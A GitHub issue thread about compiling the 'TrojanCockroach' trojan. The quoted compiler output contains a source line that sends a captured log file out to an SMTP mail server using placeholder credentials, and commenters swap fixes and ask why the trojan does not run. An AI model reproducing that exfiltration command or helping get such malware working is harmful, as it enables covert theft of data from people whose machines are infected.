### ISSUE TITLE
Could not compile

### ISSUE THREAD

**Issue by ishwarchandratiwari** [MinhasKamal/TrojanCockroach#11]
when I am trying to compile  TrojanCockroach.cpp ,   it throws error

> C:\Users\Ishwar\Downloads\trojanCockroach> g++ TrojanCockroach.cpp           
> TrojanCockroach.cpp: In function 'int main()':                                                                          TrojanCockroach.cpp:72:5: error: return-statement with no value, in function returning 'int' [-fpermissive]                  return; // :)                                                       
>                                             
> TrojanCockroach.cpp: In function 'void sendData()':                                                                     TrojanCockroach.cpp:141:21: warning: deprecated conversion from string constant to 'char*' [-Wwrite-strings]                 char* command = "Transmit smtp://smtp.gmail.com:587 -v --mail-from \"your.email@gmail.com\" --mail-rcpt \"your.email@gmail.com\" --ssl -u your.email@gmail.com:password -T \"Record.log\" -k --anyauth";                                                        ^                                                       
>                                            
> TrojanCockroach.cpp: In function 'char* getRandomName()':                                                               TrojanCockroach.cpp:272:10: warning: address of local variable 'randomName' returned [-Wreturn-local-addr]                   char randomName[40];

**Comment by stefanos-poriazis** [comment]
Remove the return statement in line 72 and it should compile.

**Comment by ishwarchandratiwari** [comment]
Thanks 

> Remove the return statement in line 72 and it should compile.

Thanks

**Comment by 100rabh4** [comment]
after removing  return; // :) in both the .cpp file.....it got  compiled and but trojan is not working...

**Comment by ariflimbong** [comment]
> after removing return; // :) in both the .cpp file.....it got compiled and but trojan is not working...

me too..may i know why?

**Comment by Rezureaxx** [comment]
> > after removing return; // :) in both the .cpp file.....it got compiled and but trojan is not working...
> 
> me too..may i know why?

Do you have a solution now?
